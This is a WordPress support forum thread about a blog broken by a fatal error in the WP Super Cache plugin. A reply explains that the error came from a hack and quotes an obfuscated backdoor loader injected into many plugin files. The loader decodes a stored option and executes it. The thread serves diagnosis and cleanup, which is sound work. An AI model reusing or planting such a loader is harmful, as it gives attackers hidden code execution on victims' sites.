WP Super Cache has broken my site… I need help please!

  • My site https://www.altrap.com is hosted at Lunarpages. The wordpress install is at https://www.altrap.com/write

    In the last 24 hours, the wordpress install has started displaying nothing but a blank page. I cannot access wp-admin to enter the control panel either – it’s also a blank page.

    I started a support ticket on lunarpages and last night they came back with the following…

    Hello,
    I’ve enabled WP_DEBUG by setting it to true in /home/altrap3/public_html/write/wp-config.php :

    define(‘WP_DEBUG’, true);

    and now the error that was causing the blank page is now showing on your index file :

    Fatal error: Call to undefined function get_option() in /home/altrap3/public_html/write/wp-content/plugins/wp-super-cache/wp-cache-phase1.php on line 2

    This means that some required files are missing or the wp-super-cache might be corrupt. A quick solution would be to re-upload all the needed files for this specific plugin or to disable it from the database and re-install it afterwards. If you encounter any issues with this please provide us the administrator username and password for the WordPress installation so we can check it as well.

    Now when I pull up the site, the above error does indeed appear. However it also appears when I try to access wp-admin too, so I’m still stuck….

    Does anyone have any clue as to what I do next? How can I access my WP control panel to remove/reinstall WP-Supercache? (I only installed it at Lunarpages’ urging too)

    ??

Viewing 5 replies - 1 through 5 (of 5 total)
  • Thread Starter djatothel

    (@djatothel)

    Update: Straight after writing this I check https://www.altrap.com/write again, and now some pages are appearing while others still bring up the Fatal Error message.

    Still no access to wp-admin though…

    Hi, I just ran across the same problem and after having a look at the file in question realised it had been hacked. wp-cache-phase1.php should not have a call to get_option on line 2. If you look at your other plugin files, you’ll probably see something similar to this at the beginning of all of them:

    $z=get_option("_transient_feed_1f198b76a8c316731dd24df4a7f4fd3e"); $z=base64_decode(str_rot13($z)); if(strpos($z,"8F8995B6")!==false){ $_z=create_function("",$z); @$_z(); }

    You should immediately disable access to your blog by whatever means available to you so that a hacker cannot continue to access and manipulate your site. You should also notify your hosting provider right away so they are aware of the situation. See https://codex.www.ads-software.com/FAQ_My_site_was_hacked for some suggestions on what to do next, but you should consider hiring an expert if you don’t know what you’re doing.

    I’m trying to uncover the entry point and the effects of the hack, but this is my first time dealing with something like this, so any suggestions would be very welcome. The exploit code is obfuscated, so I’m clearing that up. I’m also working through the logs to see if I can spot anything.

    djatothel: Can you let me know what version of WordPress you have and what plugins you have installed?

    You should have disabled web access to your blog, so to check your version of WordPress you’ll have to look in the wp-includes/version.php file for a line similar to $wp_version = '3.1.3';

    Thread Starter djatothel

    (@djatothel)

    Thanks for the info… it sounds worrying.

    Lunarpages tech support got my site back online on Friday afternoon. I immediately updated from 3.1.3 to 3.2.

    I also noticed when I logged in that my Spam Karma 2 plugin was completely gone. I don’t know if tech support removed it (maybe that was the cause of the site failure?) or it was something malicious as you describe above.

    I did notice that I have started receiving some comments spam again (something that SK2 always took care of.) On the add plugins search page I don’t see it listed anymore either.

    I did find the code line you referenced above in my other plugins… do I delete that out, or delete the entire plugin and reinstall it?

    I have the following plugins installed that all look like they have the line of code in them:
    Audio player
    Version 2.0.4.1

    AVH First Defense Against Spam
    Version 3.2

    Clean Archives Reloaded
    Version 3.2.0

    Custom Avatars For Comments
    Version 0.3

    Feedburner Feed Replacement
    Version 1.0

    Get Custom Field Values
    Version 3.2

    Get Recent Comments
    Version 2.0.6

    MP3-jPlayer
    Version 1.7.1

    Mystique Extra Nav Icons
    Version 0.5.1

    runPHP
    Version 2.3.1

    the_excerpt Reloaded
    Version 0.2

    User Avatar
    Version 1.3.6

    UTF-8 Database Converter
    Version 2.0.1

    Then there are these 5 plugins…

    WP Security Scan
    Version 3.0.1 – I just updated to Version 3.2 and after the update did not see the code line.

    WP-Supercache
    Version 0.9.9.9
    Did not have the code in it.

    ShareThis
    Version 4.1.0
    Did not have the code in it.

    SI CAPTCHA Anti-Spam
    Version 2.7.3
    Did not have the code in it.

    Spam Free WordPress
    Version 1.5.1
    Did not have the code in it. I installed this after I got access to my site because Spam Karma 2 was gone. It’s not working as well as I hoped.

    Please let me know what my next move should be….

    THANKS!

    Thread Starter djatothel

    (@djatothel)

    Sorry for clogging up this request for aid with what seems another request for aid, but I don’t know if this is relevant.

    When I use the search box on the Add Plugin page neither Askimet or Spam Karma appear in the results anymore. Are they no longer WP approved, or is this perhaps a result of something more malicious?

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘WP Super Cache has broken my site… I need help please!’ is closed to new replies.